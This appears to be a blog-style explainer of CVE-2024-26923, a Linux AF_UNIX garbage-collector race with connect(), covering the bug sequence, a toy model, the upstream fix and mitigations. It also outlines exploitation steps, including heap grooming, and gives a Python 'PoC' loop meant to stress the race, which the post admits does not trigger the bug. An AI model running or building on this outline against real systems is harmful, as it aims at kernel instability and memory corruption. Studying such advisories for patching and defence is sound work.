CVE-2024-26923 - Linux Kernel AF_UNIX Garbage Collector Race Condition – Details and Exploit Overview
A new Linux kernel vulnerability, CVE-2024-26923, has been patched in recent kernel updates. This particular issue involves a race condition in the way the AF_UNIX (Unix domain sockets) garbage collector interacts with pending connect() operations. This bug could potentially lead to elevated inflight reference counts and dangling pointers, destabilizing the socket infrastructure and opening potential security holes.
In this post, I’ll break down the vulnerability, show code snippets, explain a possible exploitation scenario, and point you to authoritative references.
1. What is AF_UNIX and Inflight Garbage Collection?
AF_UNIX sockets are commonly used for local interprocess communication (IPC) in Linux. The kernel manages these sockets and runs a dedicated garbage collector (GC) to reclaim sockets that have become unreachable from user space, for example sockets that reference each other only through queued messages.
Sockets can transmit file descriptors between processes using SCM_RIGHTS. This creates more complex reference graphs, leading the kernel to keep careful inflight reference counts to avoid premature garbage collection before all references have been dropped.
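To make the SCM_RIGHTS mechanism concrete, here is a minimal sketch of passing a socket's file descriptor over an AF_UNIX connection. It assumes Linux and Python 3.9 or later (for `socket.send_fds` and `socket.recv_fds`); the function name `pass_fd_demo` is made up for this illustration, and a `socketpair` stands in for two separate processes.

```python
import os
import socket


def pass_fd_demo():
    # A connected pair of AF_UNIX stream sockets stands in for two processes.
    left, right = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    # A second pair: we will pass one end (a) across the first pair.
    a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        # Send a's descriptor as SCM_RIGHTS ancillary data with one data byte.
        socket.send_fds(left, [b"x"], [a.fileno()])
        # Until it is received, the passed socket is queued inside the kernel.
        data, fds, _flags, _addr = socket.recv_fds(right, 1, 1)
        received = fds[0]
        # The received descriptor is a new number for the same open socket.
        b.sendall(b"hello")
        message = os.read(received, 5)
        os.close(received)
        return data, message
    finally:
        for sock in (left, right, a, b):
            sock.close()


if __name__ == "__main__":
    print(pass_fd_demo())
```

While the message sits unreceived in the queue, the passed socket is referenced only by that queued message plus whatever descriptors user space still holds. That in-between state is what the inflight accounting has to track.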
The bug is a race between two events that can happen at the same time:
- A new connection (an "embryo") is being added to a listening socket.
- The garbage collector is scanning references and possibly acting to collect unreferenced sockets.
The GC does not account for new embryos being enqueued during collection. If such an embryo has a peer that carries SCM_RIGHTS, two consecutive passes of scan_children() in the garbage collector can see a *different* set of children. This leaves an incorrectly elevated inflight count and, worse, a dangling pointer in the GC's inflight list.
Let’s step through a simplified sequence:

    // Setup: AF_UNIX/SOCK_STREAM sockets
    int S = socket(AF_UNIX, SOCK_STREAM, 0); // Unconnected socket
    int L = socket(AF_UNIX, SOCK_STREAM, 0); // Listening socket, bound to addr
    // V's fd will be passed via SCM_RIGHTS
    int V = ...; // (another socket or fd)

    // Fork/clone or use threads to race
    connect(S, addr);  // Attempt to connect S to listener L
    sendmsg(S, [V]);   // Send V via SCM_RIGHTS (shorthand, not the real signature)
    close(V);          // Close the original reference

    /* In parallel, the garbage collector runs in the kernel:
       __unix_gc();
    */
Code Data Flow Diagram

    connect(S, addr)
            |
            v
    sendmsg(S, [V]); close(V)
            |
            v
    [GC runs] scan_children(L)      // First pass
            |
            |   (embryo, i.e. unix_peer(S), not yet enqueued on L)
            v
    __skb_queue_tail(L, skb1)       // Now the embryo is added
    scan_children(L)                // Second pass sees a *different* set
            |
            v
    inflight count mismatched!
Because the embryo is invisible to the first scan but visible to the second, the second pass adds an inflight reference that the first pass never subtracted. The result: V's inflight count ends up higher than its actual reference count, and a pointer in the GC's inflight list is left dangling.
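The mismatch can be reproduced in a toy model. The sketch below is not kernel code: `ToySock`, `simulate`, and the simplified `scan_children` are invented for illustration, and the two loops only mimic the "subtract, then restore" shape of the GC passes described above. The socket names L, V, and NS (the embryo) follow the sequence shown earlier, and the model assumes L is itself a GC candidate.

```python
class ToySock:
    """Toy stand-in for a unix socket; not the kernel's real structure."""

    def __init__(self, name, refs=0, inflight=0):
        self.name = name
        self.refs = refs          # total references to the socket's file
        self.inflight = inflight  # references held by queued SCM_RIGHTS messages
        self.embryos = []         # pending connections queued on a listener
        self.fds = []             # sockets carried in this socket's receive queue


def scan_children(sock, func):
    # Visit every socket carried in sock's own queue and in its embryos' queues.
    for holder in [sock, *sock.embryos]:
        for child in holder.fds:
            func(child)


def dec_inflight(sock):
    sock.inflight -= 1


def inc_inflight(sock):
    sock.inflight += 1


def simulate(enqueue_mid_gc):
    listener = ToySock("L", refs=1, inflight=1)  # assumed: L is itself in flight
    passed = ToySock("V", refs=1, inflight=1)    # V was sent, then closed
    embryo = ToySock("NS")
    embryo.fds.append(passed)                    # V sits in the embryo's queue

    if not enqueue_mid_gc:
        listener.embryos.append(embryo)          # connect() finished before GC

    candidates = [listener, passed]
    for sock in candidates:                      # pass 1: subtract internal refs
        scan_children(sock, dec_inflight)

    if enqueue_mid_gc:
        listener.embryos.append(embryo)          # connect() lands between passes

    for sock in candidates:                      # pass 2: restore reachable refs
        if sock.inflight > 0:
            scan_children(sock, inc_inflight)

    return passed.refs, passed.inflight


if __name__ == "__main__":
    print("no race:", simulate(False))
    print("race:   ", simulate(True))
```

In this model `simulate(False)` returns `(1, 1)`, a balanced count, while `simulate(True)` returns `(1, 2)`: V's inflight count exceeds its reference count, which is the inconsistency the diagram ends on.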
Impact
While the bug is complex, a malicious local user (with permission to create and manipulate sockets) could:
- Cause the kernel to keep bogus, stale references to sockets
- Potentially use dangling pointers to trigger further kernel memory corruption or use-after-free conditions
For now, no full privilege escalation exploit is public, but DoS and stability issues are possible, and kernel bugs of this class sometimes turn out to be exploitable.
To exploit the race, an attacker would:
- Repeatedly and quickly execute connect() and sendmsg() with SCM_RIGHTS transfers to a local AF_UNIX listening socket, while monitoring or waiting for the GC to trigger
- Try to cause a child with SCM_RIGHTS to get enqueued mid-collection
- Groom the heap for anything beyond instability; the underlying primitive is refcount and list corruption, which is a classic kernel attack surface
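A simplified PoC sketch in Python:

    import array
    import multiprocessing
    import os
    import socket
    import time

    def send_fd(sock, fd):
        # Pass one file descriptor as SCM_RIGHTS ancillary data
        fds = array.array('i', [fd])
        sock.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)])

    def listener(addr_path, ready):
        # Child process: bind, listen, and accept a single connection
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            os.unlink(addr_path)
        except FileNotFoundError:
            pass
        s.bind(addr_path)
        s.listen(1)
        ready.set()  # Tell the parent it is safe to connect
        conn, _ = s.accept()
        conn.recv(1)  # Wait for the byte that accompanies the fd
        time.sleep(0.1)
        conn.close()
        s.close()

    def exploit_try(addr_path):
        # Module-level target and an Event replace the nested function and fixed sleep
        ready = multiprocessing.Event()
        p = multiprocessing.Process(target=listener, args=(addr_path, ready))
        p.start()
        ready.wait()
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        v = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.connect(addr_path)
        send_fd(s, v.fileno())
        v.close()
        s.close()
        p.join()

    if __name__ == '__main__':
        # Try to race and destabilize the kernel
        for _ in range(10000):
            exploit_try('/tmp/af_unix_race')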
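Note: This PoC does not exploit the bug. It only stresses the connect() and SCM_RIGHTS paths in a loop, and it does not arrange for the listening socket to be a GC candidate, which the race requires.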
The Fix
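The upstream patch adds a synchronization step to the GC: for every GC-candidate listening socket, it locks and then immediately unlocks that socket's state before scanning. In the words of the commit message: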
> If there is a GC-candidate listening socket, lock/unlock its state. This makes GC wait until the end of any ongoing connect() to that socket.
Relevant patch commit: af_unix: Fix garbage collector racing against connect() - kernel.org
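The lock/unlock idea can be illustrated with ordinary threads. This is a user-space analogy only, not the kernel patch: `state_lock`, `connect_started`, and `gc_with_barrier` are hypothetical names, a Python list stands in for the listener's receive queue, and the sleep merely widens the window a racing GC would otherwise hit.

```python
import threading
import time


def gc_with_barrier():
    state_lock = threading.Lock()        # stands in for the listener's state lock
    connect_started = threading.Event()
    queue = []                           # stands in for the listener's receive queue

    def connect():
        with state_lock:
            connect_started.set()
            time.sleep(0.05)             # connect() is still in progress
            queue.append("embryo")       # the enqueue happens under the lock

    worker = threading.Thread(target=connect)
    worker.start()
    connect_started.wait()               # GC starts while connect() is mid-flight

    # The barrier: take and immediately drop the lock, so a connect() that
    # already holds it must finish enqueuing before the GC looks at the queue.
    state_lock.acquire()
    state_lock.release()

    first_pass = list(queue)
    second_pass = list(queue)
    worker.join()
    return first_pass, second_pass


if __name__ == "__main__":
    print(gc_with_barrier())
```

Both passes observe the same queue contents because the barrier orders the GC after the in-progress enqueue. The sketch does not model later connections arriving after the barrier; it covers only the single connect() that was already underway.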
Mitigation
Until patched, restrict untrusted local users from creating/unlinking UNIX domain sockets, and avoid granting them the ability to pass file descriptors over sockets. Update your kernel as soon as possible.
5. References
- Patch Commit on kernel.org
- CVE-2024-26923 in NVD
- Linux AF_UNIX Internals Documentation
- LKML Patch Discussion
6. Conclusion
CVE-2024-26923 is an intricate but important Linux kernel bug involving AF_UNIX sockets and the inflight garbage collector. Left unchecked, it could lead to kernel memory corruption and system instability. The kernel team has already merged a fix, so patch your systems!
Stay tuned for further research and potential exploit writeups as this bug evolves.
*(This post is original content tailored for readers new to kernel vulnerabilities. For professional assistance, always consult upstream security advisories and kernel maintainers.)*
Timeline
Published on: 04/25/2024 06:15:57 UTC
Last modified on: 05/04/2025 08:59:47 UTC